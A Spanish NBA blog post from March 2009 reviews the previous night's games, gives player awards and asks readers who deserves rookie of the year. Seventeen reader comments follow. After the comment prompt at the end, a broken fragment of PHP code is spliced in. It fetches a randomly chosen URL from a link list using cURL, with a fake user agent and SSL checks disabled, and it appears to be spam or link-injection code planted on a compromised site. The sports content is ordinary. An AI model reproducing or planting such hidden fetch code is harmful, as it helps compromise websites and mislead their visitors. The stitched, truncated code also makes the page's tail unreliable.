La crónica (3/03/2009)

04 de March de 2009 por MagicJohnson32

Por TheDeerHunter & MagicJohnson32

La de ayer fue una noche más bien desangelada, no tanto por algún gran enfrentamiento individual sino más bien por el nivel de los choques en su conjunto, alguno de ellos sin el más mínimo interés.

Se esperaba con ganas el duelo intergeneracional entre el rejuvenecido Shaq y Dwight Howard, tributo perfecto a los 100 de Chamberlain como el que ayer ya le dieron Lebron & Wade. Si alguien pensaba que Howard se lo iba a comer crudo se lo puede ir quitando de la cabeza: más igualado, imposible. Fue el duelo Rashard-Turkoglu-Alston vs. Nash-Richardson-Leandrinho el que desequilibró la balanza a favor de los de Florida. El máximo reboteador del encuentro fue Rashard Lewis, causa-efecto del small-ball que vuelven a practicar los Suns.

Otro duelo interesante, y con mucho morbo, fue el de Billups contra sus ex de la Motown. Nunca mejor dicho. Los Pistons fueron los Pistons que solíamos conocer, con la vieja guardia al frente con el único y obligado cambio de Stuckey por Billups. Como antaño, el banquillo mirando y sólo Will Bynum aportó algún punto extra. El bueno de Chauncey se dejó la piel pero la única ayuda de Nené no fue suficiente. Otros que habían de reencontrarse, Iverson y Melo, no lo hicieron. AI, lesionado, y Carmelito “el auténtico”, sancionado por sus jefes. Si es que siempre ha tenido unos prontos “mu malos”.

Dentro de la lucha por las últimas plazas del Este, con todo el mogollón de equipos involucrados en ella, por fuerza tenía que haber partidos de interés. Los Bulls se suicidaron en Charlotte. 17 pérdidas que no se pueden cometer en estos momentos, un completo desatino en el tiro y un caos en la defensa fueron sus credenciales. Del Negro no se puede quejar ahora del equipo… y precisamente es cuando el equipo comienza a quejarse de Del Negro. En Milwaukee asistimos a un precioso duelo Brook Lopez-Villanueva. Se lo llevaron los Nets y ojo, porque si al final se clasifican para Playoffs y Chicago no, no sería nada raro que le dieran el RoY al pívot. En mi modesta opinión se lo merece como el que más. Indiana también ganó sin despeinarse en Sacramento. Siguen ahí, que no es poco.

Por último, los Rockets no tuvieron excesivos problemas en deshacerse de Toronto. Gran partido de Calderón y bonito duelo Bosh-Bargnani contra Yao-Scola. Fue el banco de Houston quien desequilibró el partido, precisamente donde Toronto tiene un vacío casi cósmico. Los Lakers también doblegaron a los Grizzlies, aunque en esta ocasión Marc le ganó la partida a su hermano. Además, los Warriors ganaron a los Wolves en el partido más intrascendende de la jornada.

PREMIOS

MVP: Destacaron las buenas actuaciones de Luis Scola (20 puntos, 16 rebotes) o los 29 puntos, 12 rebotes, 3 asistencias y 2 robos de Rashard Lewis. Pero posiblemente nadie merezca el premio más que Troy Murphy, con 23 puntos, 10 rebotes, 6 asistencias, 2 robos y 2 tapones. Mención especial también para su compañero Jarret Jack, con 26 puntos, 7 rebotes, 4 robos y 3 asistencias. Entre ambos mantienen a los Pacers a las puertas de Playoffs sin Dunleavy ni Granger.

El rookie: El gran papel de Marc ante su hermano (17 puntos, 14 rebotes, 4 asistencias, 3 tapones) le permite compartir premio con Brook Lopez, el mejor de su equipo en la victoria frente a los Bucks con 24 puntos (9 de 12 en tiros de campo), 12 rebotes, 3 tapones. Tampoco estuvo mal Kevin Love, autor de 18 puntos y 14 rebotes.

La sorpresa: El corto banquillo de los Rockets, y especial Carl Landry, quien en 32 minutos anotó 22 puntos (7 de 9 en tiros de campo y 8 de 8 en libres), cogió 6 rebotes, puso 2 tapones y logró un parcial de +30 para su equipo. Von Wafer y Kyle Lowry, los otros dos jugadores que salieron del banco de Adelman, tampoco lo hicieron nada mal. También nos hemos fijado en la magnífica adaptación de Rash McCants a los Kings; anoche, 20 puntos con inmaculados porcentajes.

La decepción: Melo la ha vuelto a liar. El pasado domingo, durante el tercer cuarto del partido ante los Pacers, Anthony se negó a ir al banquillo cuando George Karl ordenó su sustitución. Los Nuggets le suspendieron con un partido (el de anoche en Detroit), con lo que se une a un historial con diversos incidentes bien conocidos por todos.

El mayor esfuerzo en vano: Seguro que a Billups le hacía una especial ilusión ganar en Detroit. Pero sus 34 puntos y 4 asistencias no resultaron suficientes.

LA PREGUNTA DEL DÍA

Hace un par de meses la lucha por el RoY parecía cosa de 2, Derrick Rose y OJ Mayo, pero a día de hoy han aparecido otros candidatos muy sólidos como Brook López o Russell Westbrook. ¿A quién le otorgaríais vosotros finalmente el galardón?

RAZONES PARA TRASNOCHAR

Diez son los partidos que se jugarán la próxima madrugada. Podremos ver en acción a los Cavs y a los Celtics (ante Bucks y Nets respectivamente), pero nosotros destacamos otro partido:

Rockets @ Jazz. Los de Salt Lake City se han convertido en los culpables de alargar la leyenda negra de los Rockets y de T-Mac las últimas dos temporadas. Sin McGrady, los texanos tienen un buen test: acabar a domicilio con la mejor racha con diferencia en toda la liga, los ocho triunfos consecutivos de los Jazz.  La situación de la tabla clasificatoria en el Oeste, con los Rockets en 3ª posición pero sólo 2,5 partidos por encima del 8º y 1,5 por encima de los Jazz, otorga una especial trascendencia al resultado. El partido se jugará a partir de las 3:00 (hora GMT+1).

El jugador al que hay que seguir de cerca hoy es… Shaquille O’Neal. Tras confirmar en Orlando su gran estado de forma con un buen papel ante Dwight Howard, Shaq visita otra de sus antiguas casas, el AmericanAirlines Arena. Será la primera vez que juegue en Miami desde su traspaso el pasado invierno, y si ayer hubo de lidiar con Superman, hoy le corresponde sellar el aro ante el candidato al MVP Flash Wade. El partido arrancará a las 1:30 horas.

Comenta

17 comentarios a esta entrada

  1. Txusma dice:
    #1

    Pues respondiendo la pregunta, no puedo estar mas de acuerdo con DeerHunter. Mayo y Westbrook se caen de la lucha debido a la terrible temporada de sus equipos así que creo que la lucha va a ser entre Rose y Lopez. Rose tiene infinitamente mejor cartel asi que los Bulls deberian quedarse fuera y los Nets hacer un buen final de temporada con Lopez de protagonista, para que el galardon se lo lleve el ex de Stanford.

    Por cierto, Indiana 5-2 sin Granger…

      Citar

  2. Viva_Dirk dice:
    #2

    Yo sigo creyendo que si Mayo termina como máximo anotador con cierta ventaja es el máximo favorito, en lo de los rookies nunca ha pesado nada el record del equipo.

      Citar

  3. Noname dice:
    #3

    Para mi que el ROY se lo lleva Lopez al final, porque ademas de acualmente estar en la lucha con Mayo y Rose (para mi los 3 favoritos) viene con una trayectoria ascendente y de superacion, mientras Mayo esta perdiendo protagonismo y Rose se esta manteniendo mas o menos constante desde el principio (o esa es mi impresion 😛 ).

    Enhorabuena por vuestro blog y seguir asi que sois de lo mejor sobre nba en español que se puede encontrar.

    Saludos

      Citar

  4. Txusma dice:
    #4

    Pero supongo q a igualdad de actuaciones individuales algo contara el balance del equipo. Y destacar en los Grizzlies ahora mismo es un “pelin” mas facil que hacerlo en los Bulls.

      Citar

  5. Viva_Dirk dice:
    #5

    Por eso digo que mientras los números de Mayo sean mejores seguirá siendo máximo favorito al título. Mira lo que pasó con Horford y Durant el año pasado, por decir el ejemplo mas cercano.

      Citar

  6. sabas dice:
    #6

    Yo pienso que se lo daran a Mayo es un premio que es bueno que vaya a una franquicia deprimida para darle un poco de optimismo y ponerla en el mapa, y esto lo mira mucho la NBA. ¿Este premio lo votan tambien los peridistas como el MVP o lo da la NBA? De todas formas vale lo anterior.

      Citar

  7. javi dice:
    #7

    Por mi se lo daría a Brook Lopez, que jugón, a poco que acabe bien la temporada y los Nets entren en PO tendrá bastantes posibilidades. Pro bueno todo indica a que estará entre Mayo y Rose.

    Una pregunta, ¿alguien recuerda un rookie del año que haya entrado en PO el primer año y haya echo algo?. No digo ganar el anillo pro si algo importante. Ya se que las elecciones suelen ir inversamente proporcional a los números del equipo pro bueno, es x curiosidad.

    salu2

      Citar

  8. Txusma dice:
    #8

    Hablando de hace poco, Amare entro con los Suns en Playoffs en la 02-03 y promedio 14 puntos y 8 rebotes que no esta mal. Mike Miller tb se clasifico con Orlando en la 00-01 pero solo anotaba 12 puntos por partido.

    Pero el rookie que posiblemente ha tenido mayor impacto en los ultimos años ha sido Tim Duncan. Cuando gano el RoY los Spurs se clasificaron para Playoffs e incluso pasaron una ronda, con Tim promediando 20 puntos y 9 rebotes.

      Citar

  9. couxe dice:
    #9

    Yo también se lo daría a López, siempre y cuando siga al nivel que lleva estos 2 últimos meses…
    A Mayo lo dejaría como segundo, aunque me gustó más a principio de temporada que ahora, ya que se juega demasiados tiros incluso con compañeros en mejor posición que él, tal vez contagiado por Rudy Gay.
    Como curiosidad, el mejor jugador de Memphis en estadísticas globales es Marc, que ni siquiera entra en las quinielas para ROY…

      Citar

  10. Viva_Dirk dice:
    #10

    Javi, si te refieres a hace ‘poco’, estan los que te ha dicho Txusma y podriamos incluir a Webber aunque palmaron a las primeras de cambio los Warriors.

    Si dices a lo largo de la historia hay bastantes, en los 80 fue casi una constante porque los rookies de posiciones altas llegaban generalmente muy preparados y los equipos que los recibian no tenian los solares que muchos se encuentran ahora. En esa década lo consiguieron, David Robinson(pasó una ronda), Mitch Richmond(pasó una ronda), Marc Jackson, Chuck Person, Michael Jordan y Buck Williams.

    En los 70 tampoco fue muy usual porque aunque los novatos también solian rendir inmediatamente el juego aun era mas lento, controlado por entrenadores y jugadores normalmente veteranos y además coincidió con grandes jugadores que permanecieron siempre o casi siempre en la misma franquicia y que a la vez jugaron muchos años en la liga como el caso de Havlicek, Frazier, Hayes o Jabbar. En general los equipos se mantenian mas. En esa década fueron menos los que lo hicieron, entre ellos algunos de los mas grandes como Larry Bird, otros normalillos como Digregorio o Phil Ford y algun buen jugador como Wilkes, Adams o Walter Davis.

      Citar

  11. TheDeerHunter dice:
    #11

    Y nadie piensa mentar a Magic en su año de rookie y su legendario partido de la final en el que jugó de Pívot???

      Citar

  12. Viva_Dirk dice:
    #12

    Iba a decirlo yo, pero he visto que Javi preguntaba por el rookie del año y Magic no lo ganó.

      Citar

  13. MagicJohnson32 dice:
    #13

      Citar

  14. Txusma dice:
    #14

    Pues vaya se me ha caido un poco el mito. Nunca habia visto imagenes de ese partido en concreto y siempre habia pensado que Magic se casco una actuacion maravillosa jugando de pivot, cuando en el resumen jugar lo q se dice jugar de pivot no juega mucho. En todo caso, una actuacion portentosa para un rookie. Q crack!!

    Y q elegancia Julius Erving! Igualito q ahora, oye…

      Citar

  15. MagicJohnson32 dice:
    #15

    42 puntos, 15 rebotes, 7 asistencias, 3 robos y 1 tapón. Salió de pívot y jugó en todas las posiciones. Como dijo el comentarista del partido: “He starts at center, plays guard and forward, and leads the Lakers to the World Championship!”

      Citar

  16. kantonyo dice:
    #16

    Yo dudo entre Lopez y Rose. Creo que Mayo ha ido de más a menos, y además no ha aprovechado demasiado su protagonismo en el equipo.

    Posiblemente teniendo en cuenta números, personalidad, potencial, promoción y nivel de la franquicia, posiblemente el ROY será para Derrick Rose.

      Citar

  17. Txusma dice:
    #17

    No quiero q se me malinterprete. Ese partido de Magic es simplemente espectacular, simplemente tenia otra idea de como habia sido. Pero vaya que eso es lo q se llama dominar completamente un partido.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>